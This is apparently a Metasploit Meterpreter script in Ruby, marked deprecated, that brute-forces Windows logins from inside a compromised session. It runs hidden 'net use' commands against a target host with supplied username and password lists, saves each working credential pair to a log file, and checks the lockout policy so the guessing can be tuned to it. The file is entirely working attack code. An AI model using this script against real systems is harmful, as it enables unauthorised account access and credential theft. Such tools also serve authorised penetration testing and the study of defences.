## # WARNING: Metasploit no longer maintains or accepts meterpreter scripts. # If you'd like to imporve this script, please try to port it as a post # module instead. Thank you. ## # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "\tHelp menu."], "-t" => [ true, "\tTarget IP Address"], "-p" => [ true, "\tPassword List"], "-cp" => [ false, "\tCheck Local Machine Password Policy"], "-L" => [ true, "\tUsername List to be brute forced"], "-l" => [ true, "\tLogin name to be brute forced"] ) # Variables for Options user = [] ulopt = nil userlist = nil passlist = nil target = nil helpcall = 0 # The 'client' object holds the Meterpreter session # Aliasing here for plugin compatibility session = client ################## Function Definition ################## # Function for checking the password policy of current system. # This policy may resemble the policy of other servers in the #target enviroment. def chkpolicy(session) print_status("Checking password policy...") output = [] begin r = session.sys.process.execute("net accounts", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) output << d end r.channel.close r.close # Parsing output of net accounts lockout = output.to_s.scan(/Lockout\sthreshold:\s*(\d*)/) minpass = output.to_s.scan(/Minimum\spassword\slength:\s*(\d*)/) failcount = output.to_s.scan(/Lockout\sobservation\swindow\s\(minutes\)\:\s*(\d*)/) lcktime = output.to_s.scan(/Lockout\sduration\s\(minutes\)\:\s*(\d*)/) # check for account lockout if lockout.empty? print_status "\tNo account lockout threshold configured" else print_status "\tWARNING Lockout threshold configured, if #{lockout} attempts in #{failcount} minutes account will be locked" print_status "\tThe account will be locked out for #{lcktime}" end # check for password lenght if minpass.to_s == "0" print_status "\tNo minimun password lenght is configured" else print_status "\tThe minumun password lengh configured is #{minpass}" print_status "\tyour dictionary should start with passwords of #{minpass} length" end rescue ::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end end #-------------------------------------------------------- # Function for brute forcing passwords using windows native tools def passbf(session,passlist,target,user,opt,logfile) print_status("Running Brute force attack against #{user}") print_status("Successfull Username and Password pairs are being saved in #{logfile}") result = [] output = [] passfnd = 0 a = [] i = 0 if opt == 1 if not ::File.exist?(user) raise "Usernames List File does not exists!" else user = ::File.open(user, "r") end end # Go thru each user user.each do |u| # Go thru each line in the password file while passfnd < 1 ::File.open(passlist, "r").each_line do |line| begin print_status("Trying #{u.chomp} #{line.chomp}") # Command for testing local login credentials r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) output << d end r.channel.close r.close # Checks if password is found result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/) if result.length == 1 print_status("\tUser: #{u.chomp} pass: #{line.chomp} found") file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}") r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) output << d end output.clear r.channel.close r.close passfnd = 1 break end rescue ::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end end passfnd = 1 end passfnd = 0 end end #-------------------------------------------------------- # Function for creating log file def logme(target) # Create Filename info to be appended to files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for the logs logs = ::File.join(Msf::Config.log_directory,'scripts', 'winbf') # Create the log directory ::FileUtils.mkdir_p(logs) #logfile name dest = logs + "/" + target + filenameinfo dest end #-------------------------------------------------------- # ##check for proper Meterpreter Platform def unsupported print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end unsupported if client.platform != 'windows' ################## MAIN ################## # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt when "-l" user << val ulopt = 0 when "-L" userlist = val ulopt = 1 when "-cp" chkpolicy(session) exit when "-p" passlist = val if not ::File.exist?(passlist) raise "Password File does not exists!" end when "-t" target = val when "-h" print("Windows Login Brute Force Meterpreter Script\n" + "Usage:\n" + @@exec_opts.usage) helpcall = 1 end } # Execution of options selected if user.length > 0 && passlist != nil && target != nil passbf(session,passlist,target,user,ulopt,logme(target)) elsif userlist != nil && passlist != nil && target != nil passbf(session,passlist,target,userlist,ulopt,logme(target)) elsif helpcall == 0 print("Windows Login Brute Force Meterpreter Script\n" + "Usage:\n" + @@exec_opts.usage) end